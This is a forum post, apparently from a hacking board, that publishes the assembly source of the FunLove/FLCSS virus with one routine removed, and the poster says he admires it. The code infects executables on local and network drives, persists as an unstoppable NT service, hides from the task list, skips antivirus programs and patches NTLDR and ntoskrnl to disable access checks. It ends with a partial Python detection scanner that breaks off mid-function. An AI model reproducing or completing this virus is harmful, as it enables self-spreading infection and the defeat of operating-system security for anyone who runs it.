Views: 5210  Replies: 29
funlove source code released
I removed the part that locates the API addresses.
Take a good look at it, everyone. This is a virus I really like.

────────────────────────────────────────────────────────────────[FLCSS.ASM]── .386 LARGESTACK RADIX 16 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 org 100 main: I equ 1000 - 300 @ equ + ebx - offset VStart INCLUDE HEADER.ASM VStart: INCLUDE HEADER.ASM ; ------------------------------------------------------------------------- ; ; ---------------------------- Startup Code --------------------------- ; ; ------------------------------------------------------------------------- ; Virus PROC NEAR call GetVS lea esi,[HostCode @] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 or eax,eax jz short Exit cmp byte ptr [OS @],00 jnz short NT_Srv call Create9xProcess ret NT_Srv: call CreateNTService Exit: ret Virus ENDP ; ------------------------------------------------------------------------- ; ; -------------------- NT Service Creation Routine -------------------- ; ; ------------------------------------------------------------------------- ; CreateNTService PROC PASCAL NEAR LOCAL SCM_Handle : DWORD call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; get the service control manager call OpenSCManagerA ; handler or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable or eax,eax ; if process is running, just exit jz short CNT_Exit mov edi,0F01FF lea esi,[Service @] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[Buffer1 @] ; -> flcss.exe push eax push 01 ; ErrorControl push 02 ; Start push 20 ; Type push edi push 00 push esi push SCM_Handle call CreateServiceA or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread CNT_Exit: ret CreateNTService ENDP ; ------------------------------------------------------------------------- ; ; -------------------- W9x Process Creation Routine 
------------------- ; ; ------------------------------------------------------------------------- ; Create9xProcess PROC NEAR call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[Buffer2 @] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[Buffer1 @] push esi push 00 call CreateProcessA or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread P9x_Exit: ret Create9xProcess ENDP ; ------------------------------------------------------------------------- ; ; --------------------- flcss.exe Creation Routine -------------------- ; ; ------------------------------------------------------------------------- ; CreateExecutable PROC PASCAL NEAR LOCAL c_FileHandle : DWORD, \\ c_BytesWritten : DWORD USES esi,edi lea edi,[Buffer1 @] push edi push 104 push edi call GetSystemDirectoryA add edi,eax mov al,\'\\\' stosb lea esi,[Process @] movsd movsd movsd push 02 ; create always call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[VImports + 4 @] ; clean main import table mov eax,-1 stosd stosd lea edi,[Kernel32_Relocated @] ; restore 2nd imp. 
table mov eax,[edi - 8] ; (necessary for NT) stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; write header push 00 push esi push Phys_VSize push ebx push c_FileHandle call WriteFile ; write vrs push c_FileHandle call CloseHandle CE_Exit: inc eax ret CreateExecutable ENDP ; ------------------------------------------------------------------------- ; ; --------------------------- Viral Service --------------------------- ; ; ------------------------------------------------------------------------- ; VService PROC NEAR call GetVS push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [OS @],00 jz short W9x_Service_Register WNT_Service_Hacknowledge: call RelocAdvapi32 or eax,eax jz VS_Exit lea esi,[Buffer1 @] xor eax,eax lea ecx,[Service @] lea edx,[ServiceDispatcher @] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; give control back to caller ; and jump to dispatcher push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[USER32_Name @] push esi call LoadLibraryA lea esi,[RegisterClassA + 7 @] push esi push eax call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[Buffer1 @] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 ; ? 
(must be <> 0) mov dword ptr [esi + 10],400000 ; image base lea eax,[Service @] mov [esi + 24],eax push esi call RegisterClassA ; necessary, or RSP won\'t work lea esi,[RegisterServiceProcess + 7 @] push esi push dword ptr [Kernel32_Base @] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ; register our process in order push 01 ; to vanish from the task list push eax call RegisterServiceProcess push 8*1000d ; wait 8 seconds call Sleep VS_00: call StartInfectionThread VS_Exit: ret VService ENDP ; ------------------------------------------------------------------------- ; ; ----------------------- NT Service Dispatcher ----------------------- ; ; ------------------------------------------------------------------------- ; ServiceDispatcher PROC PASCAL NEAR LOCAL Service_Handle : DWORD call GetVS lea esi,[ServiceHandler @] lea edi,[Service @] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[Buffer1 @] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ; now tell windows our service call SetServiceStatus ; correctly started push 8*1000d call Sleep call StartInfectionThread ret ServiceDispatcher ENDP ; ------------------------------------------------------------------------- ; ; -------------------------- Service Handler -------------------------- ; ; ------------------------------------------------------------------------- ; ServiceHandler PROC NEAR ret ; if the admin tries to halt the ; service, he\'ll get a system error ServiceHandler ENDP ; ------------------------------------------------------------------------- ; ; ------------------- Thread Creation Routine ------------------ ; ; ------------------------------------------------------------------------- ; StartInfectionThread PROC PASCAL NEAR LOCAL ThreadId : DWORD call GetTickCount mov [Rand @],eax lea eax,ThreadId push eax push 0 push 0 
lea eax,[VThread @] push eax push 0 push 0 call CreateThread ret StartInfectionThread ENDP ; ------------------------------------------------------------------------- ; ; ---------------------------- Viral Thread --------------------------- ; ; ------------------------------------------------------------------------- ; VThread PROC NEAR call GetVS call InfectDrives push 60d * 1000d call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork jmp short VThread VThread ENDP ; ------------------------------------------------------------------------- ; ; --------------------- Network Infection Routine --------------------- ; ; ------------------------------------------------------------------------- ; InfectNetwork PROC NEAR lea eax,[MPR_Name @] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[MPR_Functions @] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret InfectNetwork ENDP ; ------------------------------------------------------------------------- ; ; ---------------------- Valid Drive Test Routine --------------------- ; ; ------------------------------------------------------------------------- ; InfectDrives PROC NEAR push esi call GetTickCount mov [Tick @],eax lea esi,[Buffer1 @] mov dword ptr [esi],\' \\:@\' ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA cmp al,03 ; fixed disk jz short ID_DriveOk cmp al,04 ; network drive jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch sub esi,03 ID_Invalid: mov al,[Buffer1 @] inc al mov [Buffer1 @],al cmp al,\'Z\' jna short ID_TestDrive pop esi ret InfectDrives ENDP ; ------------------------------------------------------------------------- ; ; ----------------- Recursive Computer Search Routine ----------------- ; ; ------------------------------------------------------------------------- ; NetSearch PROC PASCAL NEAR ARG WNetStructAddr:DWORD ; pointer to the network struct 
(20h) LOCAL EnumBufferAddr:DWORD, \\ ; network buffer address EnumBufferSize:DWORD, \\ ; network buffer size (4000h) EnumNB_Objects:DWORD ; number of network structs enumerated USES esi, edi mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; computer resource name or esi,esi ; (\\\\XXX\\C, for example) jz short NET_03 cmp word ptr [esi],0041 ; floppy ? jz short NET_03 lea edi,[Buffer1 @] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,\'\\\' stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret NetSearch ENDP ; ------------------------------------------------------------------------- ; ; ------------------- Recursive File Search Routine ------------------- ; ; ------------------------------------------------------------------------- ; FileSearch PROC PASCAL NEAR ARG CurrentDirEnd : DWORD LOCAL SearchHandle : DWORD USES esi,edi mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[Buffer2 @] lea esi,[Buffer1 @] push edi push esi call FindFirstFileA cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; dir ? 
jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],\'.\' jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,\'\\\' stosb push edi call FileSearch RS_Next: lea edi,[Buffer2 @] push edi push SearchHandle call FindNextFileA or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[SkipNames @] ; check av names mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; check extent or eax,20202020 cmp eax,\' xco\' jz short FT_02 cmp eax,\' rcs\' jz short FT_02 cmp eax,\' exe\' jnz short FT_Exit FT_02: mov eax,[edi + 20] ; minimum file size cmp eax,2000 jc short FT_Exit cmp al,03 ; self-infection test jz short FT_Exit lea esi,[Buffer1 @] ; get complete file name lea edi,[Buffer3 @] ; with path push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[Buffer2 @] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile FT_Exit: jmp RS_Next FileSearch ENDP ; ------------------------------------------------------------------------- ; ; ----------------------- File Infection Routine ---------------------- ; ; ------------------------------------------------------------------------- ; InfectFile PROC PASCAL NEAR ARG i_Filename : DWORD LOCAL i_FileHandle : DWORD, \\ i_FileSize : DWORD, \\ i_BytesRead : DWORD, \\ i_VirusOffset : DWORD, \\ i_MapHandle : DWORD, \\ i_HostDep32 : DWORD, \\ i_EP_Offset : DWORD USES esi,edi push i_Filename push 03 ; open existing call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize mov i_FileSize,eax cmp al,03 ; re-test if not already jz IN_Exit ; infected lea edi,[Buffer3 @] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile cmp word ptr [edi],5A4Dh jnz IN_CloseFile cmp word ptr [edi + 18],0040 jnz 
IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; Check DOS header size ja IN_CloseFile add edi,[edi + 3C] mov eax,[edi] cmp eax,00004550 jnz IN_CloseFile cmp word ptr [edi + 5C],2 ; Subsystem == GUI jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; esi -> 1st section push esi mov eax,[edi + 28] ; now search for the ; section which contains IN_00: ; the EP mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; make it writeable pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; esi -> last section mov eax,[esi + 24] cmp al,80 ; uninitialized ? jz IN_CloseFile or eax,8C000000 ; writeable, not cached/paged and eax,not 12000000 ; not shared/discardable mov [esi + 24],eax mov ecx,i_FileSize ; don\'t infect SFX mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; calculate new last section size mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF ; align on 1000h jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,Virt_VSize mov [edi + 50],eax ; new image size sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,Virt_VSize ; increase virtual size mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,Phys_VSize ; increase phys. 
size mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[Buffer3 @] ; write header mov edi,edx mov ecx,2000 repz movsb lea edi,[HostCode @] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; set up call gs:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx ; fill with blanks mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ; write vrs mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle call Wait_A_Little IN_CloseFile: lea esi,[Buffer2 + 14 @] ; restore file time push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle IN_Exit: ret InfectFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------- GetProcAddress Search Routine ------------------- ; ; ------------------------------------------------------------------------- ; Whereis_GPA PROC PASCAL NEAR ARG w_Kernel32 : DWORD USES esi,edi ;here some code was omitted WG_03: ret Whereis_GPA ENDP ; ------------------------------------------------------------------------- ; ; ------------------ DLL Functions Relocation Routine ----------------- ; ; ------------------------------------------------------------------------- ; DLL_Relocate PROC PASCAL NEAR ARG DLL_Base : DWORD, \\ DLL_Func : DWORD USES esi mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret DLL_Relocate ENDP ; 
------------------------------------------------------------------------- ; ; --------------------- NT Security Patch Routine --------------------- ; ; ------------------------------------------------------------------------- ; BlownAway PROC PASCAL NEAR ARG DirEnd : DWORD USES esi,edi lea esi,[NTLDR @] mov edi,DirEnd movsd movsd lea edi,[Buffer1 @] lea esi,[NT4_NTLDR @] cmp byte ptr [OS @],01 jz short BA_00 add esi,5 * 2 BA_00: push edi push esi push 05 call PatchFile lea esi,[NTOSKRNL @] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[Buffer1 @] lea esi,[NT4_NTOSKRNL @] cmp byte ptr [OS @],01 jz short BA_02 add esi,9 * 2 BA_02: push edi push esi push 09 call PatchFile ret BlownAway ENDP ; ------------------------------------------------------------------------- ; ; ------------------------- File Patch Routine ------------------------ ; ; ------------------------------------------------------------------------- ; PatchFile PROC PASCAL NEAR ARG p_Filename : DWORD, \\ p_PatchAddr : DWORD, \\ p_PatchSize : DWORD LOCAL p_FileHandle : DWORD, \\ p_FileSize : DWORD, \\ p_MapHandle : DWORD USES esi,edi push p_Filename push 03 ; open existing call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle PA_Exit: ret PatchFile ENDP ; ------------------------------------------------------------------------- ; ; --------------------------- Minor Routines 
-------------------------- ; ; ------------------------------------------------------------------------- ; GetVS: call $ + 5 pop ebx sub ebx,offset GetVS + 5 - VStart ret ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; RelocKernel32 PROC PASCAL NEAR ARG r_Kernel32 : DWORD push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[Kernel32_Functions @] push esi call DLL_Relocate RK_00: ret RelocKernel32 ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; RelocAdvapi32 PROC NEAR lea eax,[ADVAPI32_Name @] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[ADVAPI32_Functions @] push esi call DLL_Relocate RA_00: ret RelocAdvapi32 ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; OpenFile PROC PASCAL NEAR ARG o_Filename : DWORD, \\ o_OpenMode : DWORD push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; normal attributes push o_OpenMode push 00 push 00 ; not shared push 0C0000000 ; r/w push o_Filename call CreateFileA ret OpenFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; MapFile PROC PASCAL NEAR ARG m_FileHandle : DWORD, \\ m_FileSize : DWORD push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret MapFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; ViewMap PROC PASCAL NEAR ARG v_MapHandle : DWORD push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ViewMap ENDP ; 
------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; Wait_A_Little PROC NEAR call GetTickCount sub eax,[Tick @] ; allow thread to ; run for 4 seconds cmp eax,4*1000d jc short WAL_00 push 16d*1000d ; then wait 16 seconds call Sleep call GetTickCount mov [Tick @],eax WAL_00: ret Wait_A_Little ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; GetRand PROC NEAR push ecx push edx mov eax,[Rand @] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [Rand @],eax pop edx pop ecx ret GetRand ENDP ; ------------------------------------------------------------------------- ; ; -------------------------- INITIALIZED DATA ------------------------- ; ; ------------------------------------------------------------------------- ; HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db \'NTLDR\',0 NT4_NTLDR db 3Bh,46,58,74,07 ; signature (file check) db 3Bh,46,58,0EBh,07 ; patch W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 NTOSKRNL db \'WINNT\\System32\\ntoskrnl.exe\',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ; SeAccessCheck db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db \'flcss.exe\',0 Service db \'FLC\',0 ; Minimal Import Section VImports: dd offset Kernel32_Pointers + I dd -1,-1 dd offset Kernel32_Name + I dd offset Kernel32_Relocated + I db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep + I, 0 
Kernel32_Relocated dd offset Kernel32_Beep + I, 0 Kernel32_Beep db ?,?,\'Beep\',0 ; Virus Imports Kernel32_Name db \'KERNEL32.dll\',0 Kernel32_Functions: CloseHandle: db 0B8,?,?,?,?,0FF,0E0,\'CloseHandle\',0 CreateFileA: db 0B8,?,?,?,?,0FF,0E0,\'CreateFileA\',0 CreateFileMappingA: db 0B8,?,?,?,?,0FF,0E0,\'CreateFileMappingA\',0 CreateProcessA: db 0B8,?,?,?,?,0FF,0E0,\'CreateProcessA\',0 CreateThread: db 0B8,?,?,?,?,0FF,0E0,\'CreateThread\',0 FindFirstFileA: db 0B8,?,?,?,?,0FF,0E0,\'FindFirstFileA\',0 FindNextFileA: db 0B8,?,?,?,?,0FF,0E0,\'FindNextFileA\',0 FindClose: db 0B8,?,?,?,?,0FF,0E0,\'FindClose\',0 GetCurrentProcessId: db 0B8,?,?,?,?,0FF,0E0,\'GetCurrentProcessId\',0 GetDriveTypeA: db 0B8,?,?,?,?,0FF,0E0,\'GetDriveTypeA\',0 GetFileSize: db 0B8,?,?,?,?,0FF,0E0,\'GetFileSize\',0 GetProcAddress: db 0B8,?,?,?,?,0FF,0E0,\'GetProcAddress\',0 GetTickCount: db 0B8,?,?,?,?,0FF,0E0,\'GetTickCount\',0 GetSystemDirectoryA: db 0B8,?,?,?,?,0FF,0E0,\'GetSystemDirectoryA\',0 LoadLibraryA: db 0B8,?,?,?,?,0FF,0E0,\'LoadLibraryA\',0 MapViewOfFile: db 0B8,?,?,?,?,0FF,0E0,\'MapViewOfFile\',0 ReadFile: db 0B8,?,?,?,?,0FF,0E0,\'ReadFile\',0 SetFileAttributesA: db 0B8,?,?,?,?,0FF,0E0,\'SetFileAttributesA\',0 SetFileTime: db 0B8,?,?,?,?,0FF,0E0,\'SetFileTime\',0 Sleep: db 0B8,?,?,?,?,0FF,0E0,\'Sleep\',0 UnmapViewOfFile: db 0B8,?,?,?,?,0FF,0E0,\'UnmapViewOfFile\',0 VirtualAlloc: db 0B8,?,?,?,?,0FF,0E0,\'VirtualAlloc\',0 VirtualFree: db 0B8,?,?,?,?,0FF,0E0,\'VirtualFree\',0 WriteFile: db 0B8,?,?,?,?,0FF,0E0,\'WriteFile\',0 ; this function does only exist under Win9x db 0 RegisterServiceProcess: db 0B8,?,?,?,?,0FF,0E0,\'RegisterServiceProcess\',0 USER32_Name db \'USER32.dll\',0 RegisterClassA: db 0B8,?,?,?,?,0FF,0E0,\'RegisterClassA\',0 ADVAPI32_Name db \'ADVAPI32.dll\',0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,?,?,?,?,0FF,0E0,\'OpenSCManagerA\',0 OpenServiceA: db 0B8,?,?,?,?,0FF,0E0,\'OpenServiceA\',0 CreateServiceA: db 0B8,?,?,?,?,0FF,0E0,\'CreateServiceA\',0 StartServiceA: db 
0B8,?,?,?,?,0FF,0E0,\'StartServiceA\',0 StartServiceCtrlDispatcherA: db 0B8,?,?,?,?,0FF,0E0,\'StartServiceCtrlDispatcherA\',0 RegisterServiceCtrlHandlerA: db 0B8,?,?,?,?,0FF,0E0,\'RegisterServiceCtrlHandlerA\',0 SetServiceStatus: db 0B8,?,?,?,?,0FF,0E0,\'SetServiceStatus\',0 MPR_Name db \'MPR.dll\',0 MPR_Functions: WNetOpenEnumA: db 0B8,?,?,?,?,0FF,0E0,\'WNetOpenEnumA\',0 WNetEnumResourceA: db 0B8,?,?,?,?,0FF,0E0,\'WNetEnumResourceA\',0 WNetCloseEnum: db 0B8,?,?,?,?,0FF,0E0,\'WNetCloseEnum\',0 VEnd: ; ------------------------------------------------------------------------- ; ; ------------------------- UNINITIALIZED DATA ------------------------ ; ; ------------------------------------------------------------------------- ; Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; Current Directory Buffer2 db 200 dup (?) ; Search Buffer Buffer3 db 2000 dup (?) ; Read Buffer VSize equ offset VEnd - VStart Phys_VSize equ 1000 Virt_VSize equ 4000 CODE ENDS END main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FLCSS.ASM]ÄÄ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HEADER.ASM]ÄÄ? 
db 4Dh,5A, 90, 00, 03, 00, 00, 00, 04, 00, 00, 00,0FF,0FF, 00, 00 db 0B8, 00, 00, 00, 00, 00, 00, 00, 40, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 80, 00, 00, 00 db 0E, 1F,0BA, 10, 00,0B4, 09,0CDh,21,0B0,0F0,0E6, 64,0EBh,0FE,90 db 7E, 46, 75, 6E, 20, 4C, 6F, 76, 69, 6E, 67, 20, 43, 72, 69, 6Dh db 69, 6E, 61, 6C, 7E, 0Dh,0Dh,0A, 24, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 50, 45, 00, 00, 4C, 01, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00,0E0, 00, 0E, 01, 0Bh,01, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00 dd offset VService + I ; Entrypoint db 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 40, 00, 00, 10, 00, 00, 00, 02, 00, 00 db 04, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00 dd 1000 + Virt_VSize ; Image size db 00, 02, 00, 00, 00, 00, 00, 00, 02, 00, 00, 00 db 00, 00, 10, 00, 00, 10, 00, 00, 00, 00, 10, 00, 00, 10, 00, 00 db 00, 00, 00, 00, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 dd offset VImports + I ; ImportDirectory dd 14h db 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00 db \'.code\',0,0,0 ; main section dd Virt_VSize dd 00001000h dd Phys_VSize dd 00000200h db 0C dup (?) dd 0C0000020h db 60 dup (?) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HEADER.ASM]ÄÄ? |
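As an added example for this thread (not part of the original post or of the FLCSS source), the following Python scanner checks a PE file for the markers the routines above leave behind: the entry-point stub written by InfectFile, the 0x8C000000 flags set on the last section, the size-ends-in-03 self-infection marker, and the BlownAway patches to the SeAccessCheck epilogue in ntoskrnl.exe and to NTLDR. The byte patterns are copied from the data area above; the PE image it is tested on is constructed inline and is not a real binary.

```python
"""Indicator scanner for the FunLove / FLCSS infection markers that the posted
source leaves behind (added example for this thread, not part of the virus
source). Host markers: entry point overwritten with 90 90 65 E8 (nop; nop;
call gs:rel32), last section flagged 0x8C000000 (writable, not cached, not
paged) and a file size whose low byte is 0x03 (the self-infection test).
System-file markers: the SeAccessCheck and NTLDR byte patches from BlownAway."""
import struct

# Clean signature / patched bytes, copied from the NT4_* and W2K_* data items.
KERNEL_PATCHES = {
    "nt4_ntoskrnl": (bytes.fromhex("8AC35F5E5B5DC22800"), bytes.fromhex("B0015F5E5B5DC22800")),
    "w2k_ntoskrnl": (bytes.fromhex("8A45145F5E5B5DC228"), bytes.fromhex("B001905F5E5B5DC228")),
    "nt4_ntldr": (bytes.fromhex("3B46587407"), bytes.fromhex("3B4658EB07")),
    "w2k_ntldr": (bytes.fromhex("3B47587407"), bytes.fromhex("3B4758EB07")),
}
EP_STUB = bytes.fromhex("909065E8")   # "mov eax,00E8659090 / stosd" in InfectFile
SECTION_FLAGS = 0x8C000000            # "or eax,8C000000" applied to the last section
PHYS_VSIZE = 0x1000                   # Phys_VSize: raw bytes appended to the last section


def parse_pe(data):
    """Return (entry_rva, section list) for a PE32 image, or None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x18 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
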